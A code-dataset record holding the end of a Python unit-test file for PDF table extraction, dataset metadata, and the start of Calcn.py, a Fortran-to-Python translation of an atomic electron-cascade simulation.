fake_header = ["fake_header_1", "fake_header_2"]
table = [fake_header]
result = add_header_to_table(table)
self.assertEqual(result, [])
table = [fake_header, ["fake_value_1", "fake_value_2"]]
result = add_header_to_table(table)
self.assertEqual(len(result), 1)
self.assertListEqual(
result, [{"fake_header_1": "fake_value_1", "fake_header_2": "fake_value_2"}]
)
table = [
fake_header,
["fake_value_1.1", "fake_value_1.2"],
["fake_value_2.1", "fake_value_2.2"],
]
result = add_header_to_table(table)
self.assertEqual(len(result), 2)
self.assertListEqual(
result,
[
{"fake_header_1": "fake_value_1.1", "fake_header_2": "fake_value_1.2"},
{"fake_header_1": "fake_value_2.1", "fake_header_2": "fake_value_2.2"},
],
)
# Checks behaviour if header is provided
fake_header = ["fake_header_1", "fake_header_2"]
table = []
result = add_header_to_table(table, header=fake_header)
self.assertEqual(result, [])
table = [["fake_value_1", "fake_value_2"]]
result = add_header_to_table(table, header=fake_header)
self.assertEqual(len(result), 1)
self.assertListEqual(
result, [{"fake_header_1": "fake_value_1", "fake_header_2": "fake_value_2"}]
)
table = [
["fake_value_1.1", "fake_value_1.2"],
["fake_value_2.1", "fake_value_2.2"],
]
result = add_header_to_table(table, header=fake_header)
self.assertEqual(len(result), 2)
self.assertListEqual(
result,
[
{"fake_header_1": "fake_value_1.1", "fake_header_2": "fake_value_1.2"},
{"fake_header_1": "fake_value_2.1", "fake_header_2": "fake_value_2.2"},
],
)
redundant_fake_header = ["fake_header", "fake_header"]
with self.assertRaises(InvalidTableHeaderError):
result = add_header_to_table(table, header=redundant_fake_header)
too_small_fake_header = ["fake_header"]
with self.assertRaises(InvalidTableHeaderError):
result = add_header_to_table(table, header=too_small_fake_header)
def test_fix_element_in_multiple_rows(self):
# Checks that the following table is correctly extracted:
# ---------
# | 1 | 2 |
# ----| |
# | 3 | |
# ---------
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 10), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list, as_text=True)
result = extract_table(
elem_list, as_text=True, fix_element_in_multiple_rows=True
)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", ""]], result
)
def test_fix_element_in_multiple_cols(self):
# Checks that the following table is correctly extracted:
# ---------
# | 1 |
# --------|
# | 2 | 3 |
# ---------
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 10, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_3"
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list, as_text=True)
result = extract_table(
elem_list, as_text=True, fix_element_in_multiple_cols=True
)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", ""], ["fake_text_2", "fake_text_3"]], result
)
def test_get_text_from_table(self):
# Checks that it works with very simple table with one element
element = create_pdf_element(text=" fake_text ")
result = get_text_from_table([[element]])
self.assertEqual(result, [["fake_text"]])
result = get_text_from_table([[element]], strip_text=False)
self.assertEqual(result, [[" fake_text "]])
result = get_text_from_table([[None]])
self.assertEqual(result, [[""]])
# Checks that it works with table with multiple rows and columns
result = get_text_from_table([[element, None], [element, element]])
self.assertListEqual(result, [["fake_text", ""], ["fake_text", "fake_text"]])
def test_validate_table_shape(self):
# Checks that empty table has a valid shape
table = []
self.assertIsNone(_validate_table_shape(table))
# Checks that 2*2 table has a valid shape
table = [["", ""], ["", ""]]
self.assertIsNone(_validate_table_shape(table))
# Checks that 2*2 table containing None has a valid shape
table = [["", None], ["", ""]]
self.assertIsNone(_validate_table_shape(table))
# Checks that non rectangular table does not have a valid shape
table = [[""], ["", ""]]
with self.assertRaises(InvalidTableError):
_validate_table_shape(table)
| 40.672913
| 88
| 0.614241
| 2,945
| 23,875
| 4.649576
| 0.043803
| 0.153947
| 0.168845
| 0.223472
| 0.932228
| 0.913532
| 0.894983
| 0.889506
| 0.87468
| 0.857811
| 0
| 0.054223
| 0.282387
| 23,875
| 586
| 89
| 40.742321
| 0.744995
| 0.108314
| 0
| 0.675234
| 0
| 0
| 0.055396
| 0
| 0
| 0
| 0
| 0
| 0.214953
| 1
| 0.037383
| false
| 0
| 0.011682
| 0
| 0.051402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
826aa7f06d84075f7c4d821198948ef34756ea0a
| 72,681
|
py
|
Python
|
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | 1
|
2018-08-26T05:10:56.000Z
|
2018-08-26T05:10:56.000Z
|
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | null | null | null |
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | 1
|
2018-06-26T18:06:44.000Z
|
2018-06-26T18:06:44.000Z
|
import conf
import numpy
import random
from Shake import *
def CALC(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
    """Simulate an atomic de-excitation cascade for one vacancy.

    Direct machine translation of a Fortran subroutine CALC -- hence the
    Fortran-style names, the GOTO* inner functions emulating labelled
    jumps, and the repeated ``globals().update(locals())`` calls emulating
    COMMON-block sharing via module globals.

    Args (Fortran-style; exact types not visible here -- TODO confirm):
        IPN: event index, used to look up ``MCOMP[IPN]``.
        NVAC: vacancy index into the per-vacancy arrays
            (IONSUM, IFLSUM, ESTORE, EPHOTON, DRX*, DRY*, DRZ*).
        KGAS, LGAS: gas and molecular-component indices.
        ELECEN: initial energy deposit.
        ISHELL: shell in which the initial vacancy was created.
        ICON: process type; the code branches on 1 (photon),
            2 (beta decay) and 3 (double beta decay).

    NOTE(review): the original indentation was lost in extraction; block
    nesting below was reconstructed from the Fortran-style flow comments
    (# endif, # CONTINUE) and should be confirmed against the original.
    """
    # IMPLICIT #real*8(A-H,O-Z)
    # IMPLICIT #integer*8(I-N)
    # SCR=""\
    # SCR1=""
    global IFIRST,ESHK,ELECN,JVAC,R1
    ESHK=0.0
    JVAC=0.0
    def get_globals():
        # Copy shared state from module `conf` into this module's globals
        # (emulates reading the Fortran COMMON blocks).
        NDVEC=conf.NDVEC
        MSUM=conf.MSUM
        MCOMP=conf.MCOMP
        MRAYL=conf.MRAYL
        MPAIR=conf.MPAIR
        MPHOT=conf.MPHOT
        MVAC=conf.MVAC
        ELEV=conf.ELEV
        NSDEG=conf.NSDEG
        AA=conf.AA
        BB=conf.BB
        SCR=conf.SCR
        SCR1=conf.SCR1
        PRSH=conf.PRSH
        ESH=conf.ESH
        AUG=conf.AUG
        RAD=conf.RAD
        PRSHBT=conf.PRSHBT
        IZ=conf.IZ
        INIOCC=conf.INIOCC
        ISHLMX=conf.ISHLMX
        AMZ=conf.AMZ
        NOCC=conf.NOCC
        AUGR=conf.AUGR
        RADR=conf.RADR
        IONSUM=conf.IONSUM
        IFLSUM=conf.IFLSUM
        ESTORE=conf.ESTORE
        EPHOTON=conf.EPHOTON
        DRXE=conf.DRXE
        DRYE=conf.DRYE
        DRZE=conf.DRZE
        DRX=conf.DRX
        DRY=conf.DRY
        DRZ=conf.DRZ
        globals().update(locals())
    get_globals()
    def update_globals():
        # Push the (possibly modified) shared state back into `conf`
        # (emulates writing the Fortran COMMON blocks).
        conf.NDVEC=NDVEC
        conf.MSUM=MSUM
        conf.MCOMP=MCOMP
        conf.MRAYL=MRAYL
        conf.MPAIR=MPAIR
        conf.MPHOT=MPHOT
        conf.MVAC=MVAC
        conf.ELEV=ELEV
        conf.NSDEG=NSDEG
        conf.AA=AA
        conf.BB=BB
        # NOTE(review): the tuple target assigns conf.SCR and the *local*
        # SCR1, not conf.SCR1 -- presumably a typo for conf.SCR1; confirm.
        conf.SCR,SCR1=SCR,SCR1
        conf.PRSH=PRSH
        conf.ESH=ESH
        conf.AUG=AUG
        conf.RAD=RAD
        conf.PRSHBT=PRSHBT
        conf.IZ=IZ
        conf.INIOCC=INIOCC
        conf.ISHLMX=ISHLMX
        conf.AMZ=AMZ
        conf.NOCC=NOCC
        conf.AUGR=AUGR
        conf.RADR=RADR
        conf.IONSUM=IONSUM
        conf.IFLSUM=IFLSUM
        conf.ESTORE=ESTORE
        conf.EPHOTON=EPHOTON
        conf.DRXE=DRXE
        conf.DRYE=DRYE
        conf.DRZE=DRZE
        conf.DRX=DRX
        conf.DRY=DRY
        conf.DRZ=DRZ
        globals().update(locals())
    #DIMENSION
    # Scratch arrays; 1-based indexing is used throughout (Fortran legacy),
    # hence the +1 in the sizes.
    TEMP=[0 for x in range(17+1)]
    TEMP1=[0 for x in range(289+1)]
    #
    # CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
    # WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
    #
    # INITIAL PHOTON DIRECTION DRX, DRY AND DRZ
    DRXINIT=DRXE[int(NVAC)][1]
    DRYINIT=DRYE[int(NVAC)][1]
    DRZINIT=DRZE[int(NVAC)][1]
    ISHELLST=ISHELL
    def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Emulates Fortran label 2: choose and apply one fluorescence or
        # Auger transition, then recurse until no transition remains.
        global IFIRST,ESHK,ELECN,JVAC
        if(ICON==2 and IONSUM[int(NVAC)] == 1):
            return
        # GO INTO SECOND BETA LOOP
        print("calc 104 ICON,IONSUM[int(NVAC)],ISECOND= ",ICON,IONSUM[int(NVAC)],ISECOND)
        if(ICON == 3 and IONSUM[int(NVAC)] == 1 and ISECOND == 1):
            GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        print("calc 107 ICON,IFIRST,JVAC,ISECOND= ",ICON,IFIRST,JVAC,ISECOND)
        if(ICON == 3 and IFIRST == 1 and JVAC == 0 and ISECOND == 2):
            return 1
        # C
        update_globals()
        UPDATE(KGAS,LGAS,ISHELL)
        # C CHOOSE FLUORESCENCE OR AUGER TRANSITION
        TSUM=0.0
        for I in range(1,17+1):
            TSUM=TSUM+RADR[KGAS][LGAS][ISHELL][I]
            for J in range(1,17+1):
                TSUM=TSUM+AUGR[KGAS][LGAS][ISHELL][I][J]
        # 10 CONTINUE
        # C NO MORE TRANSITIONS POSSIBLE
        if(TSUM == 0.0 and ICON == 3 and ISECOND == 1):
            globals().update(locals())
            GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        if(TSUM == 0.0):
            return 1
        # C NORMALISE TO 1.0
        for I in range(1,17+1):
            RADR[KGAS][LGAS][ISHELL][I]=RADR[KGAS][LGAS][ISHELL][I]/TSUM
            for J in range(1,17+1):
                AUGR[KGAS][LGAS][ISHELL][I][J]=AUGR[KGAS][LGAS][ISHELL][I][J]/TSUM
        # 11 CONTINUE
        # C CREATE CUMULATIVE SUM ARRAY
        TEMP[1]=RADR[KGAS][LGAS][ISHELL][1]
        for I in range(2,17+1):
            TEMP[I]=RADR[KGAS][LGAS][ISHELL][I]+TEMP[I-1]
        # 12 CONTINUE
        TEMP1[1]=AUGR[KGAS][LGAS][ISHELL][1][1]
        for I in range(2,17+1):
            TEMP1[I]=AUGR[KGAS][LGAS][ISHELL][I][1]+TEMP1[I-1]
        # 13 CONTINUE
        for J in range(1,16+1):
            for I in range(1,17+1):
                TEMP1[I+(J*17)]=AUGR[KGAS][LGAS][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
        # 14 CONTINUE
        # C FIND FLUORESCENCE OR AUGER TRANSITION
        # 15
        R1=random.uniform(0.0,1.0)
        for I in range(1,17+1):
            if(R1 < TEMP[I]):
                # C STORE PHOTON ENERGY AND ANGLE THEN UPDATE NOCC
                IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
                EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]]-ELEV[I][IZ[KGAS][LGAS]]
                if(ICON == 2):
                    EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]+1]-ELEV[I][IZ[KGAS][LGAS]+1]
                if(ICON == 3):
                    EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]+2]-ELEV[I][IZ[KGAS][LGAS]+2]
                if(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]] < 0.0):
                    # WRITE(6,545)
                    # 545
                    print(' PHOTON ENERGY=%.3f NVAC=%d IFLSUM=%d IN CALC'%(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]],IFLSUM[int(NVAC)],NVAC))
                # NOTE(review): DABS is a Fortran intrinsic; it is only
                # defined here if `from Shake import *` provides it -- confirm.
                ELEFT=ELEFT-DABS(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]])
                if(ELEFT < 0.0):
                    # NOTE(review): GOTO100 is defined with 7 parameters;
                    # this zero-argument call would raise TypeError if
                    # reached -- looks like an incomplete translation.
                    GOTO100()
                # C RANDOM EMISSION DIRECTION
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
                R3=random.uniform(0.0,1.0)
                PHI=TWOPI*R3
                # C CALC DIRECTION COSINES OF FLUORESCENCE
                DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
                DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
                DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
                # C
                NOCC[KGAS][LGAS][ISHELL]=NOCC[KGAS][LGAS][ISHELL]+1
                NOCC[KGAS][LGAS][I]=NOCC[KGAS][LGAS][I]-1
                # C FIND LOWEST VACANCY
                update_globals()
                VACANCY(KGAS,LGAS,ISHELL,ILAST)
                if(ILAST == 1):
                    # C NO MORE TRANSITIONS POSSIBLE
                    # C SECOND ELECTRON IN DOUBLE BETA DECAY
                    if(ICON == 3 and ISECOND == 1):
                        globals().update(locals())
                        GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                    return
                # ENDif
                globals().update(locals())
                GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # ENDif
        # 16 CONTINUE
        globals().update(locals())
        return 1
    def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Emulates Fortran label 4: handle electron shakeoff, then run the
        # fluorescence branch (GOTO2) and, if that falls through, the
        # Auger/Coster-Kronig branch (the counter116 loop).
        global IFIRST,ESHK,ELECN,JVAC
        globals().update(locals())
        # CHECK FOR ELECTRON SHAKEOFF
        IFIRST=IFIRST+1
        if(IFIRST > 1):
            ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        globals().update(locals())
        ISHELL,ELECN,KGAS,LGAS,ESHK,ICON,IFIRST,JVAC=SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,ICON,IFIRST,JVAC)
        globals().update(locals())
        # CALCULATE ENERGY OF ELECTRON
        print("calc 203 JVAC=",JVAC)
        if(JVAC == 0):
            pass
        else:
            if(IFIRST == 1):
                # INITIAL ELECTRON + SHAKEOFF
                if(ICON == 1):
                    ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
                if(ICON == 2):
                    # NOTE(review): comma subscript ELEV[JVAC,(...)] differs
                    # from the bracket chains used elsewhere -- only valid
                    # if ELEV is a numpy array; confirm.
                    ELECN=ELECN-ESHK-ELEV[JVAC,(IZ[KGAS][int(LGAS)]+1)]
                if(ICON == 2 or ICON == 3):
                    ISHELL=JVAC
                if(ICON == 3):
                    ELECN=ELECN-ESHK-ELEV[JVAC][(IZ[int(KGAS)][int(LGAS)]+2)]
                # PRIMARY ELECTRON
                ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
            # endif
            if(ICON == 1 and IFIRST != 1):
                ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
            # endif
            IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
            # MAXIMUM ION CHARGE STATE =28
            if(IONSUM[int(NVAC)]> 28):
                #WRITE(6,99) IONSUM[int(NVAC)]
                #99
                print(' WARNING ION CHARGE LIMITED TO 28+ IN THIS VERSION')
                sys.exit()
            # endif
            # SHAKE ELECTRON
            ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
            if(ICON == 1):
                ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
            if(ICON == 2):
                ELEFT=ELEFT-ESHK-ELEV[JVAC,(IZ[KGAS,LGAS]+1)]
            if(ICON == 3):
                ELEFT=ELEFT-ESHK-ELEV[JVAC][(IZ[int(KGAS)][int(LGAS)]+2)]
            if(ELEFT < 0.0):
                globals().update(locals())
                complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                return complete
            # RANDOM EMISSION DIRECTION
            R3=random.uniform(0.0,1.0)
            THET=numpy.arccos(1.0-2.0*R3)
            R3=random.uniform(0.0,1.0)
            PHI=TWOPI*R3
            DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
            DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
            DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
        # RETURN IF NO SHAKE OFF WITH BETA DECAY
        complete=GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        if(complete):
            return 1
        # counter116/counter117 emulate Fortran labels 116/117 (re-draw R1
        # until a non-negative-energy Auger transition is selected).
        counter116=1
        while(counter116):
            counter116=0
            R2=R1-TEMP[17]
            for J in range(1,17+1):
                if(counter116):
                    break
                for I in range(1,17+1):
                    if(R2 < TEMP1[I+((J-1)*17)]):
                        # AUGER OR COSTER KRONIG
                        # STORE EJECTED ELECTRON AND UPDATE NOCC
                        ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                        if(ICON == 2):
                            ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]+1]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]+1]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+2])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]+1]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+2])*0.5
                        if(ICON == 3):
                            ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]+2]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]+2]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+3])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]+2]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+3])*0.5
                        if(ETEMP < 0.0):
                            # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
                            counter117=1
                            while(counter117):
                                counter117=0
                                R1=random.uniform(0.0,1.0)
                                if(R1 < TEMP[17]):
                                    counter117=1
                            counter116=1
                            break
                        # endif
                        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                        if(IONSUM[int(NVAC)]> 28):
                            print(' IONSUM LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)],' IN CALC')
                            sys.exit()
                        # endif
                        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                        ELEFT=ELEFT-ETEMP
                        if(ELEFT < 0.0):
                            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # RANDOM EMISSION DIRECTION
                        R3=random.uniform(0.0,1.0)
                        THET=numpy.arccos(1.0-2.0*R3)
                        R3=random.uniform(0.0,1.0)
                        PHI=TWOPI*R3
                        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                        NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                        NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                        # FIND LOWEST VACANCY
                        VACANCY(KGAS,LGAS,ISHELL,ILAST)
                        if(ILAST == 1):
                            # NO MORE TRANSITIONS POSSIBLE
                            # SECOND ELECTRON IN DOUBLE BETA DECAY
                            if(ICON == 3 and ISECOND == 1):
                                GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                                update_globals()
                            return
                        # endif
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # endif
        globals().update(locals())
    def GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Emulates Fortran label 66: start the second electron of a double
        # beta decay (direction opposite to the first, see THESEC/PHISEC).
        global IFIRST,ESHK,ELECN,JVAC
        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESECOND
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THESEC)*numpy.cos(PHISEC)
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THESEC)*numpy.sin(PHISEC)
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THESEC)
        ELECN=ESECOND
        ISECOND=2
        ISHELL=0
        IFIRST=0
        # LOOP AROUND CASCADE
        globals().update(locals())
        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        return 1
    def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Emulates Fortran label 100: (re)initialise the cascade state and
        # dispatch on process type ICON, then enter GOTO4.
        print("calcn ISHELL=", ISHELL)
        global IFIRST,ESHK,ELECN,JVAC
        complete=0
        ELEFT=ELECEN
        ISHELL=ISHELLST
        API=numpy.arccos(-1.00)
        TWOPI=2.00*API
        ISECOND=1
        IFIRST=0
        # SET STARTING ARRAY NOCC EQUAL TO INIOCC
        for I in range(1,17+1):
            NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
        # PHOTONS
        print("344 calc ICON=",ICON)
        if(ICON == 1):
            IONSUM[int(NVAC)]=1
            IFLSUM[int(NVAC)]=0
            # STORE INITIAL PHOTOELECTRON ENERGY AND ANGLE
            ESTORE[int(NVAC)][1]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
            ELECN=ESTORE[int(NVAC)][1]
            ELEFT=ELEFT-ESTORE[int(NVAC)][1]
            NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
            # ENTRY FOR COMPTON ELECTRON.....
            if(NVAC <= MCOMP[IPN]):
                # IF COMPTON EVENT ELECTRON ANGLE FROM COMPTON (ALREADY STORED)
                globals().update(locals())
                complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                return complete
            # endif
            # USE PHOTOELCTRON ANGULAR DISTRIBUTION
            APE=AA[ISHELL]
            BPE=BB[ISHELL]
            ANGGEN(APE,BPE,THET)
            if(THET < 0.0):
                THET=THET+API
            R3=random.uniform(0.0,1.0)
            PHI=TWOPI*R3
            # INITIAL PHOTON DIRECTION DRXINIT, DRYINIT AND DRZINIT
            DRCOS(DRXINIT,DRYINIT,DRZINIT,THET,PHI,DRXX,DRYY,DRZZ)
            DRXE[int(NVAC)][1]=DRXX
            DRYE[int(NVAC)][1]=DRYY
            DRZE[int(NVAC)][1]=DRZZ
            globals().update(locals())
            complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
            return complete
        # endif
        if(ICON == 2):
            # BETA DECAY
            IONSUM[int(NVAC)]=1
            IFLSUM[int(NVAC)]=0
            ISHELL=0
            ELECN=ELECEN
            ESTORE[int(NVAC)][1]=ELECN
            if(NDVEC == 2):
                # RANDOM EMISSION DIRECTION
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
            elif(NDVEC == 0):
                # RANDOM EMISSION IN THE X-Y PLANE
                THET=API/2.0
            elif(NDVEC == 1):
                # EMISSION ALONG Z AXIS
                THET=0.00
            elif(NDVEC == -1):
                # EMISSION ALONG -Z AXIS
                THET=numpy.arccos(-1.00)
            else:
                print(' ERROR NDVEC NOT CORRECT SUBROUTINE STOPPED:')
                sys.exit()
            # endif
            R3=random.uniform(0.0,1.0)
            PHI=TWOPI*R3
            DRXE[int(NVAC)][1]=numpy.sin(THET)*numpy.cos(PHI)
            DRYE[int(NVAC)][1]=numpy.sin(THET)*numpy.sin(PHI)
            DRZE[int(NVAC)][1]=numpy.cos(THET)
        # endif
        # DOUBLE BETA DECAY
        if(ICON == 3):
            IONSUM[int(NVAC)]=1
            IFLSUM[int(NVAC)]=0
            ISHELL=0
            ELECN=ELECEN
            ESTORE[int(NVAC)][1]=ELECN
            ESECOND=ELECN
            if(NDVEC == 2):
                # RANDOM EMISSION DIRECTION
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
            elif(NDVEC == 0):
                # RANDOM EMISSION IN THE X-Y PLANE
                THET=API/2.0
            elif(NDVEC == 1):
                # EMISSION ALONG Z AXIS
                THET=0.00
            elif(NDVEC == -1):
                # EMISSION ALONG -Z AXIS
                THET=numpy.arccos(-1.00)
            else:
                print(' ERROR NDVEC NOT CORRECT SUBROUTINE STOPPED:')
                sys.exit()
            # endif
            R3=random.uniform(0.0,1.0)
            PHI=TWOPI*R3
            DRXE[int(NVAC)][1]=numpy.sin(THET)*numpy.cos(PHI)
            DRYE[int(NVAC)][1]=numpy.sin(THET)*numpy.sin(PHI)
            DRZE[int(NVAC)][1]=numpy.cos(THET)
        # endif
        #
        # Second electron of a double beta decay is emitted back-to-back.
        THESEC=API-THET
        if(PHI < API):
            PHISEC=API+PHI
        else:
            PHISEC=PHI-API
        # endif
        globals().update(locals())
        print("calc IFIRST=",IFIRST)
        complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        print("got this ",complete)
        return complete
    # NOTE(review): GOTO66 is invoked unconditionally before GOTO100 here,
    # relying on ESECOND/THESEC/PHISEC already being set in module globals
    # by a previous call -- confirm this is intentional.
    globals().update(locals())
    GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    globals().update(locals())
    complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    if(complete):
        return
    print(' ERROR IN CASCADE 0')
    sys.exit()
    # end
def CALC1(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
    """Simulate a later-generation de-excitation cascade for one vacancy.

    Companion to CALC: a direct Fortran translation that continues a
    cascade starting from the counters already stored in IONSUM/IFLSUM
    (ISTART/ISTARTF below), rather than resetting them. The ``global``
    statements below mirror the original Fortran COMMON blocks, whose
    declared dimensions are preserved in the trailing comments.

    Args (Fortran-style; exact types not visible here -- TODO confirm):
        IPN: event index (passed through to the inner routines).
        NVAC: vacancy index into the per-vacancy arrays.
        KGAS, LGAS: gas and molecular-component indices.
        ELECEN: energy deposit for this generation.
        ISHELL: shell in which the vacancy was created.
        L1: index into DRX0/DRY0/DRZ0 giving the incoming photon direction.

    NOTE(review): the original indentation was lost in extraction; the
    nesting of GOTO100 > GOTO4 > GOTO2 below was reconstructed from the
    control flow and should be confirmed against the original file.
    """
    # IMPLICIT #real*8(A-H,O-Z)
    # IMPLICIT #integer*8(I-N)
    # SCR=""
    # SCR1=""
    #COMMON/GENCAS/
    global ELEV#[17,79]
    global NSDEG#(17)
    global AA#[17]
    global BB#[17]
    global SCR,SCR1
    #COMMON/MIXC/
    global PRSH#(6,3,17,17)
    global ESH#(6,3,17)
    global AUG#(6,3,17,17,17)
    global RAD#[6,3,17,17]
    global PRSHBT#(6,3,17)
    global IZ#[6,3]
